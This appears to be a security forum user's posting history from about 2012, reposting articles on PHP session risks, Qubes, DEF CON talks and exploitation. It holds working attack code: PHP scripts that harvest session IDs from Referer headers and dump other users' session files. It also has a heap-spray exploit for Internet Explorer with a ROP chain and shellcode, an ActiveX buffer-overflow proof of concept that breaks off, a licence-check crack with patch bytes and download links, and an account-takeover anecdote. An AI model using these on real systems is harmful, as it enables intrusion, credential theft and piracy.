Everything posted by Nytro
-
PHP Session ID's – The Risks
Adrian Stolarski, December 31, 2012

In today's article I want to address a very important topic: PHP session security. I know and understand that this is a very broad topic, but it is also extremely interesting. PHP, even though it is simple and intuitive, is considered a bad language if you want to write any halfway complex software. Why is that? The fault lies not with the language itself, but with the programmers and administrators who do not understand it. This article will show you how to attack a session mechanism.

Using browser weaknesses

PHP generally has two options for the transmission of session IDs. Both of them are very interesting from our point of view. The first is to transfer the session identifier in the address, so the session ID is then publicly visible. The second way is a much safer route: cookies. Although it may be safer to use a cookie, it does not give you 100% security. Well, what happens when you are on my site and I start to collect all the information from your cookies? All the cookies generated by visiting your favorite web sites, such as logging into your e-mail or a paid service? For me, the first solution is interesting and shows the lack of creativity of developers and administrators of the servers on which PHP is installed. Understanding the written code can be very difficult, though.

The first method is to simply transfer the session using the GET array. Here is an example:

    http://example.com/?PHPSESSID=b537a69ac366e85208de

Beautiful, is it not? Do you know why it is still used? Many developers and administrators are afraid that users will block their browsers' ability to receive cookies. The session.use_trans_sid option in php.ini is responsible for it. Do you know what risks it brings? When following a link, most browsers send this header:

    Referer: http://www.google.com/

Of course this is just an example. The contents of the header may be different, but that is actually irrelevant. In the header, all the information about the previously visited page is transmitted. This header is sent only when we move to another page by clicking a link, rather than typing the address into the browser. Do you have a page where pop-up ads always display in your browser? It annoys me like heck. I cannot look at them. What do I do? I buy a crafted link to my website on your website. Of course, I choose a site with a high click-through rate. My beautiful site will also contain one very malicious script. Here's the code:

    <?php
    // Append every Referer we receive to a log file
    if (isset($_SERVER['HTTP_REFERER'])) {
        $file = fopen("devilishchuckle.txt", "a");
        fputs($file, $_SERVER['HTTP_REFERER'] . "\r\n");
        fclose($file);
    }
    ?>

The hacker script works as follows. $_SERVER is a superglobal. First we check whether HTTP_REFERER is set as part of $_SERVER, then we open the specified file, write to it and close it. Beautiful and easy to use. This can be compared to the iPhone and rotten apples. Everyone who clicks on the link automatically gives their session ID to the hacker, and the hacker will be able to log in as that person and destroy the credibility of the portal.

Social engineering

This is something that neither method is immune to. Social engineering is described in the following articles:

- InfoSec Institute Resources – Social Engineering – We Start Playing
- InfoSec Institute Resources – Social Engineering 2 – What Do We Have To Watch?

How does this relate to PHP? I will describe two stories; both show the extent of human stupidity, which never disappoints. Both really happened. Here they are:

The first corresponds exactly to what I have written above. Once I managed to persuade someone to do something for me, nothing major, such as logging on to their e-mail account and then sending me the URL and their browser cookies. Then I showed that person what you can do with data that is willingly given away. It was ridiculously easy. The other one is even more humorous.

Once I entered a chat and, pretending to be a lady, got into a conversation with a desperado. He wanted a photo. I told him to give me an e-mail address. The guy did it without any resistance. I then waited for him to send me a photo. Then I asked why it had not come. I claimed that mine crashes, that it must be a mistake, and that he had to give me the password to his e-mail account so that I could write to him from there. The first thing I did was hurry and change his e-mail password. Sometimes it is remarkable how readily we give our personal details to strangers. However, I always try to verify the identity of people and do not give away precious private information to strangers. This is a principle which I always observe.

The possibility of session hijacking with access to the server

There is another thing that we must remember. If we have our website on a public server, we are never alone: in addition to the normal users, public servers are filled with bad, lazy hackers. If the administrators are lazy, it can have serious consequences. Lazy administrators always leave something like the default PHP configuration in place, for example the path where sessions are saved. By default PHP uses /tmp, a location which all users can read. It is enough to list the directory, and you can also view the session IDs. If we host the website on a large server, it will surely have a lot of sites hosted on it. This way we can get a really large number of session IDs. Now, how do we find the ones that interest us? Believe me, you do not have to use the same session ID. In a very simple way you can pull data from each session.

    <?php
    define("SESSION_DIR", "/tmp/session/"); // session dir
    define("START", 5);  // substr offset: skips the "sess_" prefix of the file name
    define("END", 32);   // substr length: the session ID itself (depends on the name)

    // Read sessions from the same directory we are listing
    session_save_path(SESSION_DIR);

    if (!isset($_GET['id'])) {
        $directory = opendir(SESSION_DIR);
        while ($files = readdir($directory)) {
            if (strpos($files, "sess_") !== 0) continue; // skip "." and ".."
            $files = substr($files, START, END);
            echo "<a href=\"session.php?id=" . $files . "\">" . $files . "</a><br>";
        }
    } else {
        // Attach to somebody else's session by its ID and dump its contents
        session_id($_GET['id']);
        session_start();
        foreach ($_SESSION as $variable => $value) {
            echo $variable . "=" . $value . "<br>";
        }
        $directory = opendir(SESSION_DIR);
        while ($files = readdir($directory)) {
            if (strpos($files, "sess_") !== 0) continue;
            $files = substr($files, START, END);
            echo "<a href=\"session.php?id=" . $files . "\">" . $files . "</a><br>";
        }
    }
    ?>

As you can see, our hacker script is very simple, yet very useful. It displays all session IDs. When you click on an ID, it shows us the data from that session. Of course, this can also be defended against. What is the fastest way to do so? Well, we can always change the path where session data is recorded to a path that is less accessible. However, just taking this step does not eliminate the risk, which exists as long as the user can list the directory. The next thing you should do is put each account in an Apache chroot or jail. This solution is also not the best, as the amount of space that must be used varies. It is of course a better idea to set safe_mode to ON in php.ini. This way no one will be able to list the directory with the PHP sessions. Of course, we still have a problem with people who have shell accounts. Just remember that if I set the chmod, they also will not be able to do much.

So how do we create a secure session ID?

In this article I have strongly criticized the session mechanisms available in PHP. This is still not the ultimate solution for running completely securely. At the end of this article I want to show an alternative way to generate session IDs in PHP. Perhaps it is not as powerful as the one already in PHP, but it sure is safer and much easier to use. The main difference in the class below is that it removes the problem of the session ID being so easy to gather. You can read more about passwords in the following article: InfoSec Institute Resources – Best Practices When Creating Passwords. As the input to the hash, the browser data and the IP address are used. As a result a session ID is created which completely avoids what is called the birthday problem, since the browser gives so much data that it is impracticable for two people to end up with the same value. The class is really very simple, and to generate the session ID hash we use md5(), because there is no point in using something else such as Mcrypt. Below is the full code of a simple class to generate session IDs:

    <?php
    define("BUFFER_SIZE", 1024);
    define("SESSION_PATH", "user_sessions/");
    define("SEPARATOR", "=");
    define("END_LINE", "\r\n");

    class SessionIDGenerator {

        public function __construct() {
        }

        // Load this client's session variables into $session_array
        public function sessionStart(&$session_array) {
            if (file_exists(SESSION_PATH . $this->userHash())) {
                $file = fopen(SESSION_PATH . $this->userHash(), "r");
                flock($file, LOCK_SH);
                while ($line = fgets($file, BUFFER_SIZE)) {
                    list($variable, $value) = explode(SEPARATOR, $line, 2);
                    $session_array[trim($variable)] = trim($value);
                }
                flock($file, LOCK_UN);
                fclose($file);
            } else {
                // First visit: create an empty session file
                $session_array = array();
                $file = fopen(SESSION_PATH . $this->userHash(), "w");
                fclose($file);
            }
        }

        // Write $session_array back to the session file
        public function sessionClose(&$session_array) {
            if (file_exists(SESSION_PATH . $this->userHash()) || isset($session_array)) {
                $file = fopen(SESSION_PATH . $this->userHash(), "w");
                flock($file, LOCK_EX);
                foreach ($session_array as $variable => $value) {
                    fputs($file, $variable . SEPARATOR . $value . END_LINE);
                }
                flock($file, LOCK_UN);
                fclose($file);
                unset($session_array);
                return true;
            } else {
                return false;
            }
        }

        // Remove the session file
        public function sessionDestroy(&$session_array) {
            unlink(SESSION_PATH . $this->userHash());
            unset($session_array);
            return;
        }

        // The session ID: a hash of the client's IP address and User-Agent
        private function userHash() {
            return md5($_SERVER['REMOTE_ADDR'] . $_SERVER['HTTP_USER_AGENT']);
        }
    }
    ?>

Now we have a mechanism to generate session IDs. How can I put it to use? It is also very simple. See for yourself:

    <?php
    // The SessionIDGenerator class above must be defined or included first
    $sessionIdGenerator = new SessionIDGenerator;
    $sessionIdGenerator->sessionStart($SessionArray);
    $SessionArray['login'] = "user";
    $SessionArray['password'] = "password";
    $sessionIdGenerator->sessionClose($SessionArray);
    ?>

At the moment, it makes no sense to write your own session management mechanism. The mechanisms built into PHP can quietly handle it. We just took the protection mechanisms of PHP sessions a little further than the standard ones.

Summary

The fact that even I took up the PHP language testifies to its extraordinary popularity. In a previous article on PHP, InfoSec Institute Resources – Nine Wishes for Your PHP Applications, I mentioned my requests to application developers. Today I raised another very important issue: the dangers associated with session IDs. This is very important because a lot of hackers could create a mess. Although this is not the focus of this article, you should know that every session shown here has expired. If you start using the information contained in this article, you have to be in a very big hurry. There is, however, such a thing as a long-term session. So if the programmer does not protect us through good session ID generation, we probably won't be protected against long-term sessions either. One day I'll show you how to write a much better session mechanism than the one built into PHP. That is not the focus of today's article. You should seriously consider combinations if you are using the session mechanism. You can keep part of the user data stored in the database as part of the cookie, and the other part stored in the session. Mechanisms for handling session data are the most important thing for anyone who writes PHP applications. Therefore it is really worth devoting a lot more time to them than to some other PHP elements.

I greet you and wish you many safe and successful PHP projects in the future.

Source: InfoSec Institute Resources – PHP Session ID's – The Risks
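A hardened session bootstrap that closes the three holes discussed in this post (ID in the URL leaking via Referer, session files in a shared /tmp, and predictable IDs), added here as an example; it is not code from the article or from the PHP project. It keeps PHP's native, randomly generated session IDs rather than deriving the ID from md5(IP + User-Agent) as the class above does (that value is computable by anyone who knows the victim's address and browser, and is identical for every user behind one NAT running the same browser), and uses a keyed hash of those values only as an extra check. The save path, the APP_SECRET environment variable and the loginUser() helper are assumptions; the array form of session_set_cookie_params() needs PHP 7.3 or newer and the session.sid_* options PHP 7.1 or newer.

```php
<?php
// Added example: hardened session bootstrap for a PHP application.
// Save path, secret and helper names are assumptions, not values from the article.
declare(strict_types=1);

// 1. Session ID only in a cookie, never in the URL, so a Referer header
//    sent to a third-party site cannot carry it (defeats the referer-logging trick).
ini_set('session.use_trans_sid', '0');
ini_set('session.use_only_cookies', '1');
ini_set('session.use_strict_mode', '1');   // refuse IDs the server never issued (anti-fixation)

// 2. Cookie flags: not readable from JavaScript, not sent over plain HTTP,
//    not attached to cross-site requests (PHP >= 7.3 array form).
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Lax',
]);

// 3. Private save path instead of the shared /tmp, so other accounts on the
//    same host cannot list sess_* files (directory path is an assumption).
$savePath = '/var/lib/php/sessions/myapp';
if (!is_dir($savePath)) {
    mkdir($savePath, 0700, true);
}
session_save_path($savePath);

// 4. Long, random, server-generated IDs (PHP >= 7.1).
ini_set('session.sid_length', '48');
ini_set('session.sid_bits_per_character', '6');

session_start();

// Keyed fingerprint of the client; used as a check, not as the session ID,
// so a leaked session file does not reveal the raw User-Agent/IP.
// APP_SECRET is an assumed per-deployment secret read from the environment.
define('APP_SECRET', getenv('APP_SECRET') ?: 'change-me');

function clientFingerprint(): string
{
    $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
    $ip = $_SERVER['REMOTE_ADDR'] ?? '';
    return hash_hmac('sha256', $ua . '|' . $ip, APP_SECRET);
}

// 5. Bind the session to the fingerprint on first use; on mismatch, destroy it.
if (!isset($_SESSION['fp'])) {
    $_SESSION['fp'] = clientFingerprint();
} elseif (!hash_equals($_SESSION['fp'], clientFingerprint())) {
    $_SESSION = [];
    session_destroy();
    http_response_code(403);
    exit('session/client mismatch');
}

// 6. Rotate the ID when privilege changes, so an ID captured before login
//    (from a Referer, a shared /tmp listing, or a copied URL) is worthless.
function loginUser(string $username): void
{
    session_regenerate_id(true);
    $_SESSION['user']     = $username;
    $_SESSION['login_at'] = time();
}
```

Binding to REMOTE_ADDR logs out users whose address changes (mobile networks, some proxies); if that is unacceptable, fingerprint the User-Agent only and rely on session_regenerate_id() plus a short session lifetime. Credentials such as the password in the usage example above never belong in $_SESSION; store the user ID and look everything else up server-side.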
-
[h=1]Qubes 2 Beta 1![/h]
by Mayuresh on December 31, 2012

Our first post regarding the Qubes OS can be found here. A few days ago Qubes 2 Beta 1 was released! This is the first Beta for Qubes Release 2 and introduces generic support for fully virtualized AppVMs (called HVMs in common Xen speak), and specifically initial support for Windows-based AppVM integration.

“Qubes implements Security by Isolation approach. To do this, Qubes utilizes virtualization technology, to be able to isolate various programs from each other, and even sandbox many system-level components, like networking or storage subsystem, so that their compromise don’t affect the integrity of the rest of the system. Qubes lets the user define many security domains implemented as lightweight Virtual Machines (VMs), or “AppVMs”. E.g. user can have “personal”, “work”, “shopping”, “bank”, and “random” AppVMs and can use the applications from within those VMs just like if they were executing on the local machine, but at the same time they are well isolated from each other. Qubes supports secure copy-and-paste and file sharing between the AppVMs, of course.”

[h=2]Changes made to Qubes:[/h]
- Support for generic fully virtualized VMs (without qemu in the TCB!)
- Support for Windows-based AppVMs integration (clipboard, file exchange, qrexec, pv drivers)
- Secure audio input to select AppVMs (Hello Skype users!)
- Clipboard is now also controlled by central policies, unified with other qrexec policies.
- Out of the box TorVM support
- Experimental support for PVUSB
- Updated Xorg packages in Dom0 to support new GPUs
- DisposableVM customization support
- … and, as usual, various fixes and other improvements

Something new this time: unlike the rest of Qubes, which is distributed under a GPL v2 license, the Qubes Windows Support Tools are not open sourced and are distributed as binaries only, under a proprietary license. They are free to use for any Qubes 2 user. The tools are not part of the Qubes 2 installation ISO (which is GPL), and are downloadable on demand.

Download Qubes: Qubes 2 Beta 1 – Qubes-R2-Beta1-x86_64-DVD.iso

Source: Qubes 2 Beta 1! — PenTestIT
-
Skype Hash Dumper 1.0
Authored by Kevin Devine

This is a tool that demonstrates dumping MD5 password hashes from the configuration file in Skype.

Download: http://packetstormsecurity.com/files/download/119155/skype_dump.zip

Source: Skype Hash Dumper 1.0 – Packet Storm
-
There are still people with that "old school" mentality who do everything for the pleasure of it and NOT for money. As long as such people exist, the "scene" will exist. We don't need your money; I would rather give you VIP if you spend that money on a book and prove to me that you read it and learned something from it, so that others can then learn from you. It's sad to see how easily money can destroy passion...
-
Yes, I've just seen it too, I like it. Hey, it automatically downloads my whole playlist.
-
Author: Nytro © Romanian Security Team 2012

I usually listen to music on YouTube, but today I got the urge to download the songs I had in my playlist. So I try a few sites, see that they work badly, then I search for and download a program that I find here: YouTube MP3 Downloader - Descarca - RO - Download.CHIP.eu. It looks OK, tidy, but then I find that it only downloads/converts half of each song. Since I had nothing better to do, I decided to try to crack it.

The first step, and the one that took me the longest, was finding where the serial is checked. It could be done simply by searching for the error message:

    007D8B51 . C785 3CFFFFFF >MOV DWORD PTR SS:[EBP-C4],Download.00638>; UNICODE "Invaild Regstration Code."

After some struggle I eventually found where the serial check is done: I simply replace a jnz that is not taken with a jmp. That was not actually the serial check, just an earlier check.

    .text:007D8AF7 test eax, eax

But then the real check is done and, likewise, a jump is made to the piece of code that tells us the serial is incorrect. A simple change from jnz to jz is enough. The procedure

    .text:007D9323 loc_7D9323:

is called from

    .text:007D8FAB jnz loc_7D9323

I had some trouble with several exceptions, but I got past them. I don't recommend IDA because it can't patch the executable directly. First you have to change something in the config to make the "Patch" menu available, then a "diff" is created with which the program is patched. More details here: Marco Ramilli's Blog: How to Patch Binary with IDA Pro

The patch is trivial:

    This difference file is created by The Interactive Disassembler

    Downloader.exe
    003D8AF9: 0F E9
    003D8AFA: 84 66
    003D8AFB: 65 01
    003D8AFC: 01 00
    003D8FAC: 85 84

And in testing, the cracked program seems to accept any serial. I reinstalled the program, it behaved the same way, I put the cracked binary in its place and it seems to work, to accept any serial. Well, I don't know whether we can call it a "crack", but that's about it. And finally it downloads the whole song for me: "CIA - Suntem tot aici.mp3"

Download crack: https://rstforums.com/proiecte/Crack.exe

Mirrors:
http://www.speedyshare.com/2M4sa/Crack.exe
http://www18.zippyshare.com/v/38589448/file.html

PS: You can compare it with the original, use "Compare It" or anything else to check the differences; only about 5 bytes differ.

Setup: http://download.chip.eu/ro/YouTube-MP3-Downloader_6745448.html

Thanks,
// Nytro
-
I haven't drunk anything, but damn me if I understood anything from this whole mess. I didn't go into the "Where are you spending New Year's Eve" topic, but I'm going there now, because I'm sure it's more interesting. Nobody is keeping you here by force. The fact that you're here is a privilege, not a right, and certainly not an obligation. It's the holidays, I'm on RST more than I should be, I should tell you all to screw off, since you don't deserve anything, rather than hanging around here.
-
Yes, the hashes are read from /etc/shadow, so you need root to be able to read them...
-
Crack Linux Hashes Using Metasploit Framework

Description: In this video I will show you how to crack Linux hashes using the Metasploit Framework auxiliary module. Make sure that your database is connected to Metasploit Framework or you will get errors. I'm using the John the Ripper auxiliary module; it will allow you to crack your hashes and read the passwords in plain text, but you have to use a dictionary for the brute-force attack. This module uses John the Ripper to identify weak passwords that have been acquired from unshadowed passwd files from Unix systems. The module will only crack MD5 and DES implementations by default. Set Crypt to true to also try to crack Blowfish and SHA implementations. Warning: This is much slower. John the Ripper Linux Password Cracker | Metasploit Exploit Database (DB)

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Source: Crack Linux Hashes Using Metasploit Framework
-
Sploitego - Maltego's (Local) Partner In Crime

Description:
PDF: https://media.defcon.org/dc-20/presentations/Douba/DEFCON-20-Douba-Sploitego.pdf
Extra: https://media.defcon.org/dc-20/presentations/Douba/Extras.zip

Have you ever wished for the power of Maltego when performing internal assessments? Ever hoped to map the internal network within seconds? Or that Maltego had a tad more aggression? Sploitego is the answer. In the presentation we'll show how we've carefully crafted several local transforms that give Maltego the ooomph to operate nicely within internal networks. Can you say Metasploit integration? ARP spoofing? Passive fingerprinting? SNMP hunting? This all is Sploitego. But wait - there's more. Along the way we'll show you how to use our awesome Python framework that makes writing local transforms as easy as 'Hello World'. Sploitego makes it easy to quickly develop, install, distribute, and maintain Maltego Local transforms. The framework comes with a rich set of auxiliary libraries to aid transform developers with integrating attack, reconnaissance, and post exploitation tools. It also provides a slew of web tools for interacting with public repositories. Sploitego and its underlying Python framework will be released at DEF CON as open source - yup - you can extend it to your heart's content. During the presentation we'll show the awesome power of the tool with live demos and scenarios as well as fun and laughter.

Nadeem Douba - GWAPT, GPEN: Currently situated in the Ottawa (Ontario, Canada) valley, Nadeem is a senior research analyst at Cygnos Information Security (a Raymond Chabot Grant Thornton company). Nadeem provides technical security consulting services to various clients in the health, education, and public sectors. Nadeem has been involved within the security community for over 10 years and has frequently presented at ISSA and company sponsored seminars and training sessions. He is also an active member of the open source software community and has contributed to projects such as libnet, Backtrack, and Maltego.

Source: Sploitego - Maltego's (Local) Partner In Crime
-
Hacking The Google TV

Description:
PDF: https://media.defcon.org/dc-20/presentations/Xenofex/DEFCON-20-Xenofex-Panel-Hacking-the-GoogleTV.pdf

The GoogleTV platform is designed to bring an integrated web experience, utilizing the Chrome web browser and Android applications, to your television. GoogleTV is based on the Android operating system, which is mainly used in tablets and smart phones, but customized with security features not normally seen on most Android devices. The current version of the platform utilizes signatures to establish a “chain of trust” from bootloader to system applications. This presentation will focus on the current GoogleTV devices, including x86 platform details, and the exhaustive security measures used by each device. The presentation will also include video demonstrations of previously found bugs and exploits for each GoogleTV device and includes specific details about how each bug works. Furthermore, we will include interesting experiences that the team has encountered along the way. Finally the talk will be capped off with the release of multiple unpublished GoogleTV exploits which will allow unsigned kernels across all x86 devices (Revue / Sony GoogleTV).

Amir "Zenofex" Etemadieh founded the GTVHacker group and has been working on the GTVHacker project from its initial start in November 2010. Amir has done independent security research in consumer electronics including the Logitech Revue, Ooma Telo, Samsung Galaxy S2, Boxee Box and services such as the 4G Clear Network, finding both hardware and software flaws. Twitter: @zenofex, GTVHacker

CJ Heres is an IT consultant during the day, tinkerer at night. He enjoys examining and repairing all sorts of devices from cars to blu-ray players. His philosophy is to use a simple approach for complex problems. CJ's recent work includes Sony GoogleTV, Boxee Box, and Vizio Smart TVs. Twitter: @cj_000_

Dan Rosenberg is a vulnerability researcher who takes sick pleasure in exploiting anything with a CPU. He once punched an Android in the face. Twitter: @djrbliss

Tom "tdweng" Dwenger is a software engineer who has been developing and reversing Android for the last 2 years. Tom is known for being able to quickly reverse Android applications and has been an active member of the GTVHacker team since its initial start in 2010. Twitter: @tdweng

Source: Hacking The Google TV
-
Demorpheus: Getting Rid Of Polymorphic Shellcodes In Your Network

Description: One of the most effective techniques used in CTF is the usage of various exploits, written with the help of well-known tools or even manually during the game. Experience in CTF participation shows that a mechanism for detecting such exploits is able to significantly increase the defense level of the team. In this presentation we propose an approach and a hybrid shellcode detection method, aimed at early detection and filtering of unknown 0-day exploits at the network level. The proposed approach allows us to summarize the capabilities of shellcode detection algorithms developed over the last ten years into optimal classifiers. The proposed approach allows us to reduce the total false-positive rate almost to 0, provides full coverage of the shellcode classes detected by the individual classifiers and significantly increases the total throughput of the detectors. Evaluation with shellcode datasets, including Metasploit Framework 4.3 plain-text, encrypted and obfuscated shellcodes, benign Win32 and Linux ELF executables, random data and multimedia, shows that the hybrid data-flow classifier significantly boosts analysis throughput for benign data - up to 45 times faster than a linear combination of classifiers, and almost 1.5 times faster for shellcode-only datasets.

Svetlana Gaivoronski is a PhD student at Computer Systems Lab, Computer Science Dept. of Moscow State University, Russia. Svetlana is a member of the Bushwhackers CTF team, which has achieved the following results in recent years: 2nd place in Deutsche Post Security Cup 2010, 6th place in the final of ruCTF 2012 (8th at qualification), 12th place at ruCTF Europe 2011, 4th place in the final of ruCTF 2011 (and 1st at qualification), etc. Svetlana works on the Redsecure project (experimental IDS/IPS) at Moscow State University. Her primary interests are network worm propagation detection and filtering, shellcode detection, static and runtime analysis of malware. Twitter: @SadieSV, lvk.cs.msu.su/~sadie

Dennis Gamayunov holds a PhD and works as Senior Researcher at Computer Systems Lab, Computer Science Dept. of Moscow State University, Russia. Dennis is the leader of the small network security research group in MSU, project lead of the experimental event-driven and natively multicore Redsecure IDS/IPS, founder of the Bushwhackers CTF team, with primary research and practical interests in network level malcode detection, high-speed traffic processing (including FPGA-based), and OS security with fine-grained privilege separation, SELinux and beyond. Twitter: @jamadharma, http://redsecure.ru/team/denis-gamayunov

PDF: https://media.defcon.org/dc-20/presentations/Svetlana-Gaivoronski/DEFCON-20-Svetlana-Gaivoronski-Demorpheus.pdf
Extra: https://media.defcon.org/dc-20/presentations/Svetlana-Gaivoronski/Extras.zip

Source: Demorpheus: Getting Rid Of Polymorphic Shellcodes In Your Network
-
New Techniques In SQLi Obfuscation: SQL Never Before Used In SQLi

Description: SQLi remains a popular sport in the security arms race. However, after analysis of hundreds of thousands of real-world SQLi attacks, output from SQLi scanners, published reports, analysis of WAF source code, and database vendor documentation, both SQLi attackers and defenders have missed a few opportunities. This talk will iterate through the dark corners of SQL for use in new obfuscated attacks, and show why they are problematic for regular-expression based WAFs. This will point the way for new directions in SQLi research for both offense and defense.

Nick Galbreath is a director of engineering at Etsy, overseeing groups handling fraud, security, authentication and internal tools. Over the last 18 years, Nick has held leadership positions in a number of social and e-commerce companies, including Right Media, UPromise, Friendster, and Open Market, and has consulted for many more. He is the author of "Cryptography for Internet and Database Applications" (Wiley), and was awarded a number of patents in the area of social networking. He holds a master's degree in mathematics from Boston University. Twitter: @ngalbreath, client9, https://github.com/client9

PDF: https://media.defcon.org/dc-20/presentations/Galbreath/DEFCON-20-Galbreath-SQLi-Obfuscation.pdf

Source: New Techniques In SQLi Obfuscation: SQL Never Before Used In SQLi
-
BeEF Framework Petty Theft

Description: In this video I will show you how to perform social engineering after hooking the browser. Say you have made a website that needs login credentials; in between, you can use your technique and some social engineering to steal a Facebook or any other password using your custom logos. This video is all about phishing using BeEF, the Browser Exploitation Framework.

Source: BeEF Framework Petty Theft
-
Heap spraying in Internet Explorer with rop nops Lately I have been learning to write some exploits for some of my old discovered vulnerabilities to get it working on Windows 7 with IE9. Previously when exploiting vulnerabilities my POCs had always been on Windows XP IE6 just to make sure it worked and not having to worry about all the mitigations in later versions. In this post I am just sharing some basic info which will hopefully to help others when writing/understanding exploits for the first time while at the same time keeping it simple and not worrying to much about performance or precision. In my old exploits I used the heap spraying code below when testing on IE6. (Just removed the un from unescape as Symantec’s Endpoint Protection doesnt like it in this section, maybe they are just too close to each other as the following unescapes are fine) <SCRIPT language="JavaScript"> var calc, chunk_size, headersize, nopsled, nopsled_len; var heap_chunks, i; calc = escape("%ucccc?"); chunk_size = 0x40000; headersize = 0x24; nopsled = escape("??"); nopsled_len = chunk_size - (headersize + calc.length); while (nopsled.length < nopsled_len) nopsled += nopsled; nopsled = nopsled.substring(0, nopsled_len); heap_chunks = new Array(); for (i = 0 ; i < 1000 ; i++) heap_chunks[i] = nopsled + calc; </SCRIPT> From IE8 things had changed not only because it supported DEP but heap spraying for the above code did not spray the heap. After going through some exploits a realised the only change from the above code I really had to make was by spraying the heap using “substring” function. So the code would now look like this code = nopsled + calc; heap_chunks = new Array(); for (i = 0 ; i < 1000 ; i++) heap_chunks[i] = code.substring(0, code.length); Trying this heap spray code now on Windows 7 with IE9 again failed to spray. 
After reading Peter Van Eeckhoutte’s heap spraying tutorial on how heap spraying was achieved in IE9 got me thinking to see if I could simplify the code and after a few tests it literately came down to just changing one byte in each chunk. So my final spray code ended up is adding a count to each chunk just to make it unique for (i = 0 ; i < 1000 ; i++) { codewithnum = i + code; heap_chunks[i] = codewithnum.substring(0, codewithnum.length); } This code would now spray on all IE browsers and execute our payload on machines that did not support DEP. With machines supporting DEP a ROP chain is required to make our code executable. For this I decided to use ROP chains generated by mona on library msvcr71.dll which gets shipped with Java 6 and is a non-ASLRed. Due to jumping to our first gadget needed to be precise I wanted to write a javascript code where our sprayed chunks will be full of rop nops saving me the trouble of calculating the precise offset as offsets might vary from different OS’es plus landing in another chunk might have another offset. Alignment is still an issue at times but just incrementing or decrementing our used return address normally solves the issue. So each chunk would only have one rop + calc shellcode at the end of the chunk instead of multiple shellcode blocks in a chunk. All I did was change the nopshed value to nopsled = unescape("%q6224?"); // 0x7c376224 RETN [MSVCR71.dll] Putting it all together we now get a working script for Internet Explorer 6/7/8 and 9. (I had to replace the u with a q otherwise the formatting on the browser gets messed up). 
    <SCRIPT language="JavaScript">
    function padnum(n, numdigits) {
        n = n.toString();
        var pnum = '';
        if (numdigits > n.length) {
            for (z = 0; z < (numdigits - n.length); z++)
                pnum += '0';
        }
        return pnum + n.toString();
    }

    var rop, calc, chunk_size, headersize, nopsled, nopsled_len, code;
    var heap_chunks, i, codewithnum;

    //
    // !mona rop -m msvcr71.dll
    // * changed from default mona rop chain output
    //
    rop = unescape(
        "%q2e4d%q7c36" +  // 0x7c362e4d, # POP EBP # RETN
        "%q2e4d%q7c36" +  // 0x7c362e4d, # skip 4 bytes
        "%qf053%q7c34" +  // 0x7c34f053, # POP EBX # RETN
        "%q00c8%q0000" +  // 0x000000c8, # 0x000000c8-> ebx (size 200 bytes) *
        "%q4364%q7c34" +  // 0x7c344364, # POP EDX # RETN
        "%q0040%q0000" +  // 0x00000040, # 0x00000040-> edx
        "%qf62d%q7c34" +  // 0x7c34f62d, # POP ECX # RETN
        "%qe945%q7c38" +  // 0x7c38e945, # &Writable location
        "%q496e%q7c36" +  // 0x7c36496e, # POP EDI # RETN
        "%q6c0b%q7c34" +  // 0x7c346c0b, # RETN (ROP NOP)
        "%q2adb%q7c37" +  // 0x7c372adb, # POP ESI # RETN
        "%q15a2%q7c34" +  // 0x7c3415a2, # JMP [EAX]
        "%q4edc%q7c34" +  // 0x7c344edc, # POP EAX # RETN
        "%qa151%q7c37" +  // 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF *
        "%q8c81%q7c37" +  // 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
        "%q5c30%q7c34");  // 0x7c345c30, # ptr to 'push esp # ret '

    //
    // ruby msfpayload windows/exec cmd=calc.exe J
    // windows/exec - 200 bytes
    // http://www.metasploit.com
    // VERBOSE=false, EXITFUNC=process, CMD=calc.exe
    //
    calc = unescape(
        "%qe8fc%q0089%q0000%q8960%q31e5%q64d2%q528b%q8b30" +
        "%q0c52%q528b%q8b14%q2872%qb70f%q264a%qff31%qc031" +
        "%q3cac%q7c61%q2c02%qc120%q0dcf%qc701%qf0e2%q5752" +
        "%q528b%q8b10%q3c42%qd001%q408b%q8578%q74c0%q014a" +
        "%q50d0%q488b%q8b18%q2058%qd301%q3ce3%q8b49%q8b34" +
        "%qd601%qff31%qc031%qc1ac%q0dcf%qc701%qe038%qf475" +
        "%q7d03%q3bf8%q247d%qe275%q8b58%q2458%qd301%q8b66" +
        "%q4b0c%q588b%q011c%q8bd3%q8b04%qd001%q4489%q2424" +
        "%q5b5b%q5961%q515a%qe0ff%q5f58%q8b5a%qeb12%q5d86" +
        "%q016a%q858d%q00b9%q0000%q6850%q8b31%q876f%qd5ff" +
        "%qf0bb%qa2b5%q6856%q95a6%q9dbd%qd5ff%q063c%q0a7c" +
        "%qfb80%q75e0%qbb05%q1347%q6f72%q006a%qff53%q63d5" +
        "%q6c61%q2e63%q7865%q0065");

    //
    chunk_size = 0x40000;
    headersize = 0x24;
    nopsled = unescape("%q6224%q7c37"); // 0x7c376224 RETN [MSVCR71.dll]
    nopsled_len = chunk_size - (headersize + rop.length + calc.length);

    while (nopsled.length < nopsled_len)
        nopsled += nopsled;
    nopsled = nopsled.substring(0, nopsled_len);

    code = nopsled + rop + calc;
    heap_chunks = new Array();
    for (i = 0 ; i < 1000 ; i++) {
        codewithnum = padnum(i,4) + code;
        heap_chunks[i] = codewithnum.substring(0, codewithnum.length);
    }
    </SCRIPT>

Here are two images from the top and bottom of one of the chunks. One thing to note is that the calc shellcode size in the above example is 200 bytes and this size needs to be set in our rop chain. Because the shellcode is at the bottom of the chunk, if the size used by VirtualProtect is greater than our shellcode it reads past the chunk, leading to an invalid address and triggering an exception.

Here is an example of an exploit I wrote for testing purposes. I discovered this one quite some time ago. The ActiveX library awApi4.dll from "Vantage Linguistics AnswerWorks" contains a number of vulnerable stack-based buffer overflow methods. The Secunia advisory link is here. The ActiveX control had been killbitted at the time with the Microsoft patch MS07-069/942615.
    <OBJECT classid="clsid:C1908682-7B2C-4AB0-B98E-183649A0BF84" id="poc">
    </OBJECT>
    <SCRIPT language="JavaScript">
    var buffer = "";
    for (i = 0; i < 215; i++)
        buffer += unescape("%41")
    buffer += unescape("%23%62%37%7c")  // 0x7c376223 POP EAX # RETN
    buffer += unescape("%42%42%42%42")  // compensate
    buffer += unescape("%42%42%42%42")  // compensate
    buffer += unescape("%08%08%08%08")  // fill return address
    buffer += unescape("%a9%13%34%7c")  // XCHG EAX,ESP # MOV EAX,DWORD
